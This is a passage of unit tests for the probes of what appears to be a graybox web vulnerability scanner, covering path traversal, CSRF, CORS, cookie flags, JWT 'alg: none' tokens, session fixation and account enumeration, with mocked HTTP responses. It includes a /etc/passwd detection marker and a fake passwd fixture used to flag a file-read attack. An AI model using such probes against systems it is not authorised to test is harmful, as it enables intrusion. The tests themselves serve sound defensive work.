+ + +class TestPathTraversal(unittest.TestCase): + + def test_path_traversal_detected(self): + """/etc/passwd content in response → vulnerable/HIGH.""" + probe = _make_probe() + probe.discovered_routes = ["/download/"] + session = probe.auth.official_session + + normal_resp = _mock_response(status=200, text="Normal content") + passwd_resp = _mock_response( + status=200, + text="root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin\n", + ) + + call_count = [0] + def mock_get(url, **kwargs): + call_count[0] += 1 + params = kwargs.get("params", {}) + for v in params.values(): + if "etc/passwd" in str(v): + return passwd_resp + return normal_resp + + session.get = MagicMock(side_effect=mock_get) + + probe._test_path_traversal() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A03-03" and f.status == "vulnerable"] + 
self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-22", vuln[0].cwe) + + def test_path_traversal_safe(self): + """No file content markers → not_vulnerable.""" + probe = _make_probe() + probe.discovered_routes = ["/page/"] + session = probe.auth.official_session + session.get = MagicMock(return_value=_mock_response(status=200, text="Safe page content")) + + probe._test_path_traversal() + clean = [f for f in probe.findings if f.scenario_id == "PT-A03-03" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_path_traversal_no_session(self): + """No official session → skip.""" + probe = _make_probe(official_session=None) + probe.auth.official_session = None + probe._test_path_traversal() + self.assertEqual(len(probe.findings), 0) + + +class TestCapabilities(unittest.TestCase): + + def test_capabilities(self): + """InjectionProbes declares correct capabilities.""" + self.assertTrue(InjectionProbes.requires_auth) + self.assertFalse(InjectionProbes.requires_regular_session) + self.assertFalse(InjectionProbes.is_stateful) + + def test_all_findings_are_graybox(self): + """All findings are GrayboxFinding.""" + probe = _make_probe(discovered_forms=["/search/"]) + session = probe.auth.official_session + session.get.return_value = _mock_response( + text='
    ', + ) + session.post.return_value = _mock_response(text="safe") + + probe._test_authenticated_injection() + for f in probe.findings: + self.assertIsInstance(f, GrayboxFinding) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_probes_misconfig.py b/extensions/business/cybersec/red_mesh/tests/test_probes_misconfig.py new file mode 100644 index 00000000..68a36200 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_probes_misconfig.py @@ -0,0 +1,413 @@ +"""Tests for MisconfigProbes.""" + +import base64 +import json +import unittest +from unittest.mock import MagicMock, PropertyMock +from http.cookiejar import Cookie + +from extensions.business.cybersec.red_mesh.graybox.probes.misconfig import MisconfigProbes +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxFinding +from extensions.business.cybersec.red_mesh.graybox.models.target_config import ( + GrayboxTargetConfig, MisconfigConfig, BusinessLogicConfig, WorkflowEndpoint, +) + + +def _mock_response(status=200, text="", headers=None, content_type="text/html"): + resp = MagicMock() + resp.status_code = status + resp.text = text + h = {"content-type": content_type} + if headers: + h.update(headers) + resp.headers = h + return resp + + +def _make_probe(debug_paths=None, workflow_endpoints=None, + official_session=None, anon_session=None, + discovered_forms=None, login_path="/auth/login/"): + misconfig = MisconfigConfig(debug_paths=debug_paths or ["/debug/"]) + business = BusinessLogicConfig( + workflow_endpoints=workflow_endpoints or [], + ) + cfg = GrayboxTargetConfig( + misconfig=misconfig, + business_logic=business, + login_path=login_path, + ) + auth = MagicMock() + auth.official_session = official_session + auth.anon_session = anon_session or MagicMock() + safety = MagicMock() + safety.throttle = MagicMock() + + probe = MisconfigProbes( + target_url="http://testapp.local:8000", + auth_manager=auth, + 
target_config=cfg, + safety=safety, + discovered_forms=discovered_forms or [], + ) + return probe + + +class TestDebugExposure(unittest.TestCase): + + def test_debug_exposure(self): + """Debug endpoint returns 200 with body → vulnerable.""" + probe = _make_probe(debug_paths=["/debug/config/"]) + session = probe.auth.anon_session + session.get.return_value = _mock_response( + status=200, text="DEBUG_MODE=True SECRET_KEY=xxx" + "x" * 50, + ) + + probe._test_debug_exposure() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A02-01" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + + def test_debug_not_found(self): + """Debug endpoint returns 404 → not_vulnerable.""" + probe = _make_probe(debug_paths=["/debug/config/"]) + session = probe.auth.anon_session + session.get.return_value = _mock_response(status=404, text="Not Found") + + probe._test_debug_exposure() + clean = [f for f in probe.findings if f.scenario_id == "PT-A02-01" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + +class TestCors(unittest.TestCase): + + def test_cors_wildcard(self): + """Access-Control-Allow-Origin: * → vulnerable.""" + probe = _make_probe() + session = probe.auth.anon_session + session.get.return_value = _mock_response( + headers={"Access-Control-Allow-Origin": "*"}, + ) + + probe._test_cors() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A02-02" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "MEDIUM") + + +class TestSecurityHeaders(unittest.TestCase): + + def test_security_headers_missing(self): + """Missing X-Frame-Options etc. 
class TestSecurityHeaders(unittest.TestCase):

    def test_security_headers_missing(self):
        """A response with no hardening headers is reported vulnerable."""
        probe = _make_probe()
        probe.auth.anon_session.get.return_value = _mock_response(headers={})

        probe._test_security_headers()

        matches = [
            finding for finding in probe.findings
            if finding.scenario_id == "PT-A02-03" and finding.status == "vulnerable"
        ]
        self.assertEqual(len(matches), 1)
        self.assertIn("X-Frame-Options", matches[0].evidence[0])


class TestCookieAttributes(unittest.TestCase):

    def _make_cookie(self, name="sessionid", secure=False, httponly=False, samesite=None):
        """Return a mock cookie exposing the attributes the probe inspects."""
        cookie = MagicMock()
        cookie.name = name
        cookie.secure = secure
        cookie.has_nonstandard_attr = MagicMock(return_value=httponly)
        cookie.get_nonstandard_attr = MagicMock(return_value=samesite)
        return cookie

    def test_cookie_insecure(self):
        """A session cookie lacking Secure/HttpOnly is reported vulnerable."""
        session = MagicMock()
        session.cookies = [self._make_cookie(secure=False, httponly=False)]
        probe = _make_probe(official_session=session)

        probe._test_cookie_attributes()

        matches = [
            finding for finding in probe.findings
            if finding.scenario_id == "PT-A02-04" and finding.status == "vulnerable"
        ]
        self.assertEqual(len(matches), 1)


class TestCsrfBypass(unittest.TestCase):

    def test_csrf_bypass_no_token(self):
        """A POST accepted without a CSRF token is a HIGH CWE-352 finding."""
        session = MagicMock()
        session.post.return_value = _mock_response(status=200, text="Success")
        probe = _make_probe(
            official_session=session,
            workflow_endpoints=[WorkflowEndpoint(path="/api/transfer/")],
        )

        probe._test_csrf_bypass()

        matches = [
            finding for finding in probe.findings
            if finding.scenario_id == "PT-A02-05" and finding.status == "vulnerable"
        ]
        self.assertEqual(len(matches), 1)
        self.assertEqual(matches[0].severity, "HIGH")
        self.assertIn("CWE-352", matches[0].cwe)

    def test_csrf_bypass_rejected(self):
        """A POST rejected with 403 is reported not_vulnerable."""
        session = MagicMock()
        session.post.return_value = _mock_response(status=403, text="CSRF token missing")
        probe = _make_probe(
            official_session=session,
            workflow_endpoints=[WorkflowEndpoint(path="/api/transfer/")],
        )

        probe._test_csrf_bypass()

        matches = [
            finding for finding in probe.findings
            if finding.scenario_id == "PT-A02-05" and finding.status == "not_vulnerable"
        ]
        self.assertEqual(len(matches), 1)

    def test_csrf_bypass_skips_login(self):
        """The login form is excluded from CSRF testing."""
        session = MagicMock()
        session.post.return_value = _mock_response(status=200, text="OK")
        probe = _make_probe(
            official_session=session,
            discovered_forms=["/auth/login/", "/profile/edit/"],
            login_path="/auth/login/",
        )

        probe._test_csrf_bypass()

        matches = [
            finding for finding in probe.findings
            if finding.scenario_id == "PT-A02-05" and finding.status == "vulnerable"
        ]
        # Only /profile/edit/ should be tested, not /auth/login/
        if matches:
            for evidence in matches[0].evidence:
                if "endpoints_without_csrf" in evidence:
                    self.assertNotIn("/auth/login/", evidence)


class TestSessionToken(unittest.TestCase):

    def _make_jwt(self, alg="none", payload=None, signature=""):
        """Build a compact JWT string with the given header alg and payload."""
        header_part = base64.urlsafe_b64encode(json.dumps({"alg": alg}).encode()).rstrip(b"=").decode()
        body_part = base64.urlsafe_b64encode(json.dumps(payload or {}).encode()).rstrip(b"=").decode()
        return f"{header_part}.{body_part}.{signature}"

    def test_session_token_jwt_alg_none(self):
        """A JWT session token with alg=none is a HIGH finding."""
        session = MagicMock()
        session.cookies.get_dict.return_value = {"token": self._make_jwt(alg="none")}
        probe = _make_probe(official_session=session)

        probe._test_session_token()

        matches = [
            finding for finding in probe.findings
            if finding.scenario_id == "PT-A02-06" and finding.status == "vulnerable"
        ]
        self.assertEqual(len(matches), 1)
        self.assertEqual(matches[0].severity, "HIGH")

    def test_session_token_short(self):
        """A very short session identifier is reported inconclusive/LOW."""
        session = MagicMock()
        session.cookies.get_dict.return_value = {"sid": "abc123"}
        probe = _make_probe(official_session=session)

        probe._test_session_token()

        matches = [
            finding for finding in probe.findings
            if finding.scenario_id == "PT-A02-06" and finding.status == "inconclusive"
        ]
        self.assertEqual(len(matches), 1)
        self.assertEqual(matches[0].severity, "LOW")

    def test_session_token_adequate(self):
        """A long random-looking session token is reported not_vulnerable."""
        session = MagicMock()
        session.cookies.get_dict.return_value = {
            "sessionid": "a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4",
        }
        probe = _make_probe(official_session=session)

        probe._test_session_token()

        matches = [
            finding for finding in probe.findings
            if finding.scenario_id == "PT-A02-06" and finding.status == "not_vulnerable"
        ]
        self.assertEqual(len(matches), 1)


class TestSessionFixation(unittest.TestCase):

    def _mock_cookie_jar(self, cookie_dict):
        """Return a mock that answers get_dict() like a RequestsCookieJar."""
        jar = MagicMock()
        jar.get_dict.return_value = cookie_dict
        return jar

    def _wire_sessions(self, probe, pre_cookies, post_cookies):
        """Attach a pre-auth anonymous session and a post-auth official session."""
        anon = MagicMock()
        anon.get.return_value = _mock_response(text="Login page")
        anon.cookies = self._mock_cookie_jar(pre_cookies)
        anon.close = MagicMock()
        probe.auth.make_anonymous_session.return_value = anon

        official = MagicMock()
        official.cookies = self._mock_cookie_jar(post_cookies)
        probe.auth.official_session = official

    def test_session_fixation_detected(self):
        """An unchanged session cookie across login is a HIGH CWE-384 finding."""
        probe = _make_probe()
        self._wire_sessions(
            probe,
            pre_cookies={"sessionid": "FIXED_TOKEN_123"},
            post_cookies={"sessionid": "FIXED_TOKEN_123"},
        )
        probe.auth.detected_csrf_field = None

        probe._test_session_fixation()

        matches = [
            finding for finding in probe.findings
            if finding.scenario_id == "PT-A07-03" and finding.status == "vulnerable"
        ]
        self.assertEqual(len(matches), 1)
        self.assertEqual(matches[0].severity, "HIGH")
        self.assertIn("CWE-384", matches[0].cwe)

    def test_session_fixation_rotated(self):
        """A rotated session cookie after login is reported not_vulnerable."""
        probe = _make_probe()
        self._wire_sessions(
            probe,
            pre_cookies={"sessionid": "PRE_AUTH_TOKEN"},
            post_cookies={"sessionid": "POST_AUTH_TOKEN"},
        )
        probe.auth.detected_csrf_field = None

        probe._test_session_fixation()

        matches = [
            finding for finding in probe.findings
            if finding.scenario_id == "PT-A07-03" and finding.status == "not_vulnerable"
        ]
        self.assertEqual(len(matches), 1)

    def test_session_fixation_no_pre_cookies(self):
        """Without pre-auth cookies the check is skipped entirely."""
        probe = _make_probe()
        anon = MagicMock()
        anon.get.return_value = _mock_response(text="Login page")
        anon.cookies = self._mock_cookie_jar({})
        anon.close = MagicMock()
        probe.auth.make_anonymous_session.return_value = anon
        probe.auth.official_session = MagicMock()

        probe._test_session_fixation()

        fixation_findings = [f for f in probe.findings if f.scenario_id == "PT-A07-03"]
        self.assertEqual(len(fixation_findings), 0)

    def test_session_fixation_ignores_csrf_cookie(self):
        """An unchanged CSRF cookie value is not treated as session fixation."""
        probe = _make_probe()
        self._wire_sessions(
            probe,
            pre_cookies={"csrftoken": "SAME_CSRF", "sessionid": "PRE_AUTH"},
            post_cookies={"csrftoken": "SAME_CSRF", "sessionid": "POST_AUTH"},
        )
        probe.auth.detected_csrf_field = "csrfmiddlewaretoken"

        probe._test_session_fixation()

        # csrftoken same is fine; sessionid changed -> not_vulnerable
        vulnerable = [
            f for f in probe.findings
            if f.scenario_id == "PT-A07-03" and f.status == "vulnerable"
        ]
        self.assertEqual(len(vulnerable), 0)
        clean = [
            f for f in probe.findings
            if f.scenario_id == "PT-A07-03" and f.status == "not_vulnerable"
        ]
        self.assertEqual(len(clean), 1)
class TestAccountEnumeration(unittest.TestCase):
    """Login-response differences that allow username enumeration (PT-A07-04)."""

    def _wire_anon_session(self, probe, session):
        """Register *session* as the anonymous session with CSRF handling disabled."""
        probe.auth.make_anonymous_session.return_value = session
        probe.auth.detected_csrf_field = None
        probe.auth.extract_csrf_value = MagicMock(return_value=None)

    def test_account_enumeration_detected(self):
        """Different error messages for valid/invalid username → vulnerable."""
        probe = _make_probe()
        probe.regular_username = "admin"

        session = MagicMock()
        # NOTE(review): the original login-page HTML fixture was lost during
        # extraction; an empty body still lets the probe fetch the page.
        # Confirm the exact fixture against version control.
        session.get.return_value = _mock_response(text='')
        session.close = MagicMock()

        # Removed the dead `call_count` accumulator: it was incremented on
        # every POST but never asserted anywhere.
        def mock_post(url, **kwargs):
            data = kwargs.get("data", {})
            if data.get("username", "") == "admin":
                return _mock_response(text='Invalid password for this account')
            return _mock_response(text='No account found with that username')

        session.post = MagicMock(side_effect=mock_post)
        self._wire_anon_session(probe, session)

        probe._test_account_enumeration()
        vuln = [f for f in probe.findings if f.scenario_id == "PT-A07-04" and f.status == "vulnerable"]
        self.assertEqual(len(vuln), 1)
        self.assertEqual(vuln[0].severity, "MEDIUM")
        self.assertIn("CWE-204", vuln[0].cwe)

    def test_account_enumeration_consistent(self):
        """Same error messages → not_vulnerable."""
        probe = _make_probe()
        probe.regular_username = "admin"

        session = MagicMock()
        session.get.return_value = _mock_response(text='')
        session.post.return_value = _mock_response(text='Invalid credentials')
        session.close = MagicMock()
        self._wire_anon_session(probe, session)

        probe._test_account_enumeration()
        clean = [f for f in probe.findings if f.scenario_id == "PT-A07-04" and f.status == "not_vulnerable"]
        self.assertEqual(len(clean), 1)

    def test_account_enumeration_status_code_diff(self):
        """Different status codes for valid/invalid → vulnerable."""
        probe = _make_probe()
        probe.regular_username = "admin"

        session = MagicMock()
        session.get.return_value = _mock_response(text='')
        session.close = MagicMock()

        def mock_post(url, **kwargs):
            data = kwargs.get("data", {})
            if data.get("username") == "admin":
                return _mock_response(status=200, text="Wrong password")
            return _mock_response(status=302, text="Redirect")

        session.post = MagicMock(side_effect=mock_post)
        self._wire_anon_session(probe, session)

        probe._test_account_enumeration()
        vuln = [f for f in probe.findings if f.scenario_id == "PT-A07-04" and f.status == "vulnerable"]
        self.assertEqual(len(vuln), 1)


class TestCapabilities(unittest.TestCase):
    """Class-level capability flags and finding-type guarantees."""

    def test_capabilities(self):
        """MisconfigProbes declares correct capabilities."""
        self.assertFalse(MisconfigProbes.requires_auth)
        self.assertFalse(MisconfigProbes.requires_regular_session)
        self.assertFalse(MisconfigProbes.is_stateful)

    def test_all_findings_are_graybox(self):
        """All findings are GrayboxFinding instances."""
        probe = _make_probe(debug_paths=["/debug/"])
        probe.auth.anon_session.get.return_value = _mock_response(status=404, text="x")
        probe._test_debug_exposure()
        for finding in probe.findings:
            self.assertIsInstance(finding, GrayboxFinding)


if __name__ == '__main__':
    unittest.main()
import unittest
from unittest.mock import MagicMock

from extensions.business.cybersec.red_mesh.services.config import (
    get_attestation_config,
    get_graybox_budgets_config,
    get_llm_agent_config,
    resolve_config_block,
)
from extensions.business.cybersec.red_mesh.services.reconciliation import (
    get_distributed_job_reconciliation_config,
    reconcile_job_workers,
)


class TestWorkerReconciliation(unittest.TestCase):
    """Config-block resolution helpers and worker-state reconciliation."""

    @staticmethod
    def _stub_owner(**attrs):
        """Return a MagicMock owner with only the given attributes pinned."""
        owner = MagicMock()
        for name, value in attrs.items():
            setattr(owner, name, value)
        return owner

    def _make_owner(self, now=100.0, stale_timeout=30):
        """Owner stub for reconcile_job_workers with a fixed clock."""
        owner = MagicMock()
        owner.time.return_value = now
        owner.cfg_distributed_job_reconciliation = {"STALE_TIMEOUT": stale_timeout}
        return owner

    @staticmethod
    def _job_specs(worker_extra=None):
        """Return a minimal job-spec dict with one worker ('worker-A')."""
        worker = {"start_port": 1, "end_port": 10, "assignment_revision": 3}
        if worker_extra:
            worker.update(worker_extra)
        return {"job_id": "job-1", "job_pass": 2, "workers": {"worker-A": worker}}

    @staticmethod
    def _live_payload(assignment_revision_seen=3, updated_at=100.0, started_at=90.0,
                      first_seen_live_at=90.0, last_seen_at=100.0):
        """Return a live-progress payload for worker-A with overridable timestamps."""
        return {
            "job_id": "job-1",
            "worker_addr": "worker-A",
            "pass_nr": 2,
            "assignment_revision_seen": assignment_revision_seen,
            "progress": 40.0,
            "phase": "service_probes",
            "ports_scanned": 4,
            "ports_total": 10,
            "open_ports_found": [],
            "completed_tests": [],
            "updated_at": updated_at,
            "started_at": started_at,
            "first_seen_live_at": first_seen_live_at,
            "last_seen_at": last_seen_at,
        }

    def test_resolve_config_block_uses_defaults(self):
        owner = self._stub_owner(cfg_distributed_job_reconciliation=None, CONFIG={})

        resolved = resolve_config_block(
            owner,
            "DISTRIBUTED_JOB_RECONCILIATION",
            {"STARTUP_TIMEOUT": 45.0, "STALE_TIMEOUT": 120.0},
        )

        self.assertEqual(resolved, {"STARTUP_TIMEOUT": 45.0, "STALE_TIMEOUT": 120.0})

    def test_resolve_config_block_merges_partial_override(self):
        owner = self._stub_owner(cfg_distributed_job_reconciliation={"STARTUP_TIMEOUT": 20})

        resolved = resolve_config_block(
            owner,
            "DISTRIBUTED_JOB_RECONCILIATION",
            {"STARTUP_TIMEOUT": 45.0, "STALE_TIMEOUT": 120.0},
        )

        self.assertEqual(resolved, {"STARTUP_TIMEOUT": 20, "STALE_TIMEOUT": 120.0})

    def test_resolve_config_block_ignores_non_dict_override(self):
        owner = self._stub_owner(
            cfg_distributed_job_reconciliation="bad",
            CONFIG={"DISTRIBUTED_JOB_RECONCILIATION": {"STARTUP_TIMEOUT": 25}},
        )

        resolved = resolve_config_block(
            owner,
            "DISTRIBUTED_JOB_RECONCILIATION",
            {"STARTUP_TIMEOUT": 45.0, "STALE_TIMEOUT": 120.0},
        )

        self.assertEqual(resolved, {"STARTUP_TIMEOUT": 45.0, "STALE_TIMEOUT": 120.0})

    def test_resolve_config_block_returns_copy(self):
        owner = self._stub_owner(cfg_distributed_job_reconciliation=None)
        defaults = {"STARTUP_TIMEOUT": 45.0}

        resolved = resolve_config_block(owner, "DISTRIBUTED_JOB_RECONCILIATION", defaults)
        resolved["STARTUP_TIMEOUT"] = 10.0

        self.assertEqual(defaults["STARTUP_TIMEOUT"], 45.0)

    def test_llm_agent_config_uses_defaults(self):
        owner = self._stub_owner(cfg_llm_agent=None, CONFIG={})

        resolved = get_llm_agent_config(owner)

        self.assertEqual(resolved["ENABLED"], False)
        self.assertEqual(resolved["TIMEOUT"], 120.0)
        self.assertEqual(resolved["AUTO_ANALYSIS_TYPE"], "security_assessment")

    def test_llm_agent_config_merges_partial_override(self):
        owner = self._stub_owner(cfg_llm_agent={"ENABLED": True, "TIMEOUT": 30})

        resolved = get_llm_agent_config(owner)

        self.assertEqual(resolved["ENABLED"], True)
        self.assertEqual(resolved["TIMEOUT"], 30.0)
        self.assertEqual(resolved["AUTO_ANALYSIS_TYPE"], "security_assessment")

    def test_llm_agent_config_normalizes_invalid_values(self):
        owner = self._stub_owner(cfg_llm_agent={
            "ENABLED": True,
            "TIMEOUT": 0,
            "AUTO_ANALYSIS_TYPE": "",
        })

        resolved = get_llm_agent_config(owner)

        self.assertEqual(resolved["ENABLED"], True)
        self.assertEqual(resolved["TIMEOUT"], 120.0)
        self.assertEqual(resolved["AUTO_ANALYSIS_TYPE"], "security_assessment")

    def test_attestation_config_uses_defaults(self):
        owner = self._stub_owner(cfg_attestation=None, CONFIG={})

        resolved = get_attestation_config(owner)

        self.assertEqual(resolved["ENABLED"], True)
        self.assertEqual(resolved["PRIVATE_KEY"], "")
        self.assertEqual(resolved["MIN_SECONDS_BETWEEN_SUBMITS"], 86400.0)
        self.assertEqual(resolved["RETRIES"], 2)

    def test_attestation_config_merges_partial_override(self):
        owner = self._stub_owner(cfg_attestation={"ENABLED": False, "RETRIES": 5})

        resolved = get_attestation_config(owner)

        self.assertEqual(resolved["ENABLED"], False)
        self.assertEqual(resolved["PRIVATE_KEY"], "")
        self.assertEqual(resolved["MIN_SECONDS_BETWEEN_SUBMITS"], 86400.0)
        self.assertEqual(resolved["RETRIES"], 5)

    def test_attestation_config_normalizes_invalid_values(self):
        owner = self._stub_owner(cfg_attestation={
            "ENABLED": True,
            "PRIVATE_KEY": None,
            "MIN_SECONDS_BETWEEN_SUBMITS": -1,
            "RETRIES": "bad",
        })

        resolved = get_attestation_config(owner)

        self.assertEqual(resolved["ENABLED"], True)
        self.assertEqual(resolved["PRIVATE_KEY"], "")
        self.assertEqual(resolved["MIN_SECONDS_BETWEEN_SUBMITS"], 86400.0)
        self.assertEqual(resolved["RETRIES"], 2)

    def test_graybox_budgets_config_uses_defaults(self):
        owner = self._stub_owner(cfg_graybox_budgets=None, CONFIG={})

        resolved = get_graybox_budgets_config(owner)

        self.assertEqual(resolved["AUTH_ATTEMPTS"], 10)
        self.assertEqual(resolved["ROUTE_DISCOVERY"], 100)
        self.assertEqual(resolved["STATEFUL_ACTIONS"], 1)

    def test_graybox_budgets_config_merges_partial_override(self):
        owner = self._stub_owner(cfg_graybox_budgets={"AUTH_ATTEMPTS": 3, "STATEFUL_ACTIONS": 0})

        resolved = get_graybox_budgets_config(owner)

        self.assertEqual(resolved["AUTH_ATTEMPTS"], 3)
        self.assertEqual(resolved["ROUTE_DISCOVERY"], 100)
        self.assertEqual(resolved["STATEFUL_ACTIONS"], 0)

    def test_graybox_budgets_config_normalizes_invalid_values(self):
        owner = self._stub_owner(cfg_graybox_budgets={
            "AUTH_ATTEMPTS": 0,
            "ROUTE_DISCOVERY": -1,
            "STATEFUL_ACTIONS": "bad",
        })

        resolved = get_graybox_budgets_config(owner)

        self.assertEqual(resolved["AUTH_ATTEMPTS"], 10)
        self.assertEqual(resolved["ROUTE_DISCOVERY"], 100)
        self.assertEqual(resolved["STATEFUL_ACTIONS"], 1)

    def test_reconciliation_config_uses_defaults(self):
        owner = self._stub_owner(cfg_distributed_job_reconciliation=None, CONFIG={})

        resolved = get_distributed_job_reconciliation_config(owner)

        self.assertEqual(resolved["STARTUP_TIMEOUT"], 45.0)
        self.assertEqual(resolved["STALE_TIMEOUT"], 120.0)
        self.assertEqual(resolved["STALE_GRACE"], 30.0)
        self.assertEqual(resolved["MAX_REANNOUNCE_ATTEMPTS"], 3)

    def test_reconciliation_config_merges_partial_override(self):
        owner = self._stub_owner(cfg_distributed_job_reconciliation={"STARTUP_TIMEOUT": 20})

        resolved = get_distributed_job_reconciliation_config(owner)

        self.assertEqual(resolved["STARTUP_TIMEOUT"], 20.0)
        self.assertEqual(resolved["STALE_TIMEOUT"], 120.0)
        self.assertEqual(resolved["STALE_GRACE"], 30.0)
        self.assertEqual(resolved["MAX_REANNOUNCE_ATTEMPTS"], 3)

    def test_reconciliation_config_normalizes_invalid_values(self):
        owner = self._stub_owner(cfg_distributed_job_reconciliation={
            "STARTUP_TIMEOUT": 0,
            "STALE_TIMEOUT": -1,
            "STALE_GRACE": -5,
            "MAX_REANNOUNCE_ATTEMPTS": "bad",
        })

        resolved = get_distributed_job_reconciliation_config(owner)

        self.assertEqual(resolved["STARTUP_TIMEOUT"], 45.0)
        self.assertEqual(resolved["STALE_TIMEOUT"], 120.0)
        self.assertEqual(resolved["STALE_GRACE"], 30.0)
        self.assertEqual(resolved["MAX_REANNOUNCE_ATTEMPTS"], 3)

    def test_reconcile_job_workers_marks_active_worker(self):
        owner = self._make_owner()
        job_specs = self._job_specs()
        live_payloads = {"job-1:worker-A": self._live_payload()}

        reconciled = reconcile_job_workers(owner, job_specs, live_payloads=live_payloads, now=100.0)

        self.assertEqual(reconciled["worker-A"]["worker_state"], "active")

    def test_reconcile_job_workers_marks_stale_worker(self):
        owner = self._make_owner(now=100.0, stale_timeout=10)
        job_specs = self._job_specs()
        live_payloads = {
            "job-1:worker-A": self._live_payload(
                updated_at=80.0, started_at=70.0,
                first_seen_live_at=70.0, last_seen_at=80.0,
            ),
        }

        reconciled = reconcile_job_workers(owner, job_specs, live_payloads=live_payloads, now=100.0)

        self.assertEqual(reconciled["worker-A"]["worker_state"], "stale")

    def test_reconcile_job_workers_marks_unreachable_worker(self):
        owner = self._make_owner()
        job_specs = self._job_specs(worker_extra={"terminal_reason": "unreachable"})

        reconciled = reconcile_job_workers(owner, job_specs, live_payloads={}, now=100.0)

        self.assertEqual(reconciled["worker-A"]["worker_state"], "unreachable")

    def test_reconcile_job_workers_marks_unseen_when_live_revision_mismatch(self):
        owner = self._make_owner()
        job_specs = self._job_specs()
        live_payloads = {"job-1:worker-A": self._live_payload(assignment_revision_seen=2)}

        reconciled = reconcile_job_workers(owner, job_specs, live_payloads=live_payloads, now=100.0)

        self.assertEqual(reconciled["worker-A"]["worker_state"], "unseen")
        self.assertEqual(reconciled["worker-A"]["ignored_live_reason"], "revision_mismatch")
import json
import unittest
from unittest.mock import MagicMock

from extensions.business.cybersec.red_mesh.services.resilience import run_bounded_retry
from extensions.business.cybersec.red_mesh.services.triage import _merge_triage_into_archive_dict

from .conftest import mock_plugin_modules


class TestRegressionScenarios(unittest.TestCase):
    """Regression coverage for retry, stale-write, triage-merge, and listing paths."""

    def _get_plugin_class(self):
        """Import the plugin class behind mocked plugin-framework modules."""
        mock_plugin_modules()
        from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin
        return PentesterApi01Plugin

    def test_archive_retry_after_partial_failure(self):
        """Bounded retry recovers a transient archive verification failure."""
        host = MagicMock()
        host.P = MagicMock()
        host._log_audit_event = MagicMock()
        calls = []

        def _operation():
            calls.append(1)
            # First attempt fails (returns None), second succeeds.
            return None if len(calls) < 2 else {"job_id": "job-1"}

        result = run_bounded_retry(
            host,
            "archive_verify",
            3,
            _operation,
            is_success=lambda payload: isinstance(payload, dict) and payload.get("job_id") == "job-1",
        )

        self.assertEqual(result["job_id"], "job-1")
        self.assertEqual(len(calls), 2)
        host._log_audit_event.assert_any_call(
            "retry_attempt", {"action": "archive_verify", "attempt": 1, "attempts": 3},
        )

    def test_stale_write_conflict_detection_regression(self):
        """Revision mismatch still produces a stale-write audit event."""
        Plugin = self._get_plugin_class()
        plugin = MagicMock()
        plugin.cfg_instance_id = "test-instance"
        plugin.chainstore_hget.return_value = {"job_id": "job-1", "job_revision": 5}
        plugin.chainstore_hset = MagicMock()
        plugin._log_audit_event = MagicMock()
        plugin.P = MagicMock()

        updated = Plugin._write_job_record(
            plugin, "job-1", {"job_id": "job-1", "job_revision": 3}, context="regression",
        )

        self.assertEqual(updated["job_revision"], 6)
        plugin._log_audit_event.assert_called_once()

    def test_triage_merge_does_not_mutate_archive_source(self):
        """Triage view merging must not rewrite the immutable archive payload."""
        archive = {
            "job_id": "job-1",
            "passes": [{"findings": [{"finding_id": "f-1", "title": "Issue"}]}],
            "ui_aggregate": {"top_findings": [{"finding_id": "f-1", "title": "Issue"}]},
        }

        merged = _merge_triage_into_archive_dict(archive, {"f-1": {"status": "accepted_risk"}})

        self.assertEqual(merged["passes"][0]["findings"][0]["triage"]["status"], "accepted_risk")
        self.assertNotIn("triage", archive["passes"][0]["findings"][0])

    def test_multi_node_completion_order_variance_keeps_archive_query_stable(self):
        """Equivalent job listings should remain stable across completion-order variance."""
        Plugin = self._get_plugin_class()
        jobs = {
            "job-1": {
                "job_id": "job-1",
                "job_status": "RUNNING",
                "job_pass": 2,
                "run_mode": "SINGLEPASS",
                "launcher": "node-a",
                "launcher_alias": "node-a",
                "target": "example.com",
                "scan_type": "network",
                "target_url": "",
                "task_name": "Test",
                "start_port": 1,
                "end_port": 10,
                "date_created": 1.0,
                "job_config_cid": "QmConfig",
                "workers": {
                    "node-a": {"finished": True},
                    "node-b": {"finished": True},
                },
                "timeline": [],
                "pass_reports": [{"pass_nr": 1, "report_cid": "Qm1"}, {"pass_nr": 2, "report_cid": "Qm2"}],
            },
        }
        plugin = MagicMock()
        plugin.cfg_instance_id = "test-instance"
        plugin.chainstore_hgetall.return_value = jobs
        plugin._normalize_job_record = MagicMock(side_effect=lambda key, value: (key, value))
        plugin._get_all_network_jobs = lambda: Plugin._get_all_network_jobs(plugin)

        first = Plugin.list_network_jobs(plugin)
        second = Plugin.list_network_jobs(plugin)

        self.assertEqual(json.dumps(first, sort_keys=True), json.dumps(second, sort_keys=True))
import unittest
from unittest.mock import MagicMock

from extensions.business.cybersec.red_mesh.models import (
    CStoreJobRunning, JobArchive, JobConfig, PassReport, WorkerProgress, CStoreWorker,
)
from extensions.business.cybersec.red_mesh.repositories import ArtifactRepository, JobStateRepository


class TestJobStateRepository(unittest.TestCase):
    """CStore-backed job-state repository: raw, typed, and triage access paths."""

    def _make_owner(self):
        """Owner stub exposing only the instance id the repository needs."""
        owner = MagicMock()
        owner.cfg_instance_id = "test-instance"
        return owner

    def test_job_state_repository_reads_and_writes_jobs(self):
        """get_job/put_job delegate to chainstore hget/hset under the instance hkey."""
        owner = self._make_owner()
        repo = JobStateRepository(owner)

        repo.get_job("job-1")
        owner.chainstore_hget.assert_called_once_with(hkey="test-instance", key="job-1")

        repo.put_job("job-1", {"job_id": "job-1"})
        owner.chainstore_hset.assert_called_once_with(
            hkey="test-instance", key="job-1", value={"job_id": "job-1"},
        )

    def test_job_state_repository_uses_live_namespace(self):
        """Live-progress helpers use the ':live' hkey namespace."""
        owner = self._make_owner()
        repo = JobStateRepository(owner)

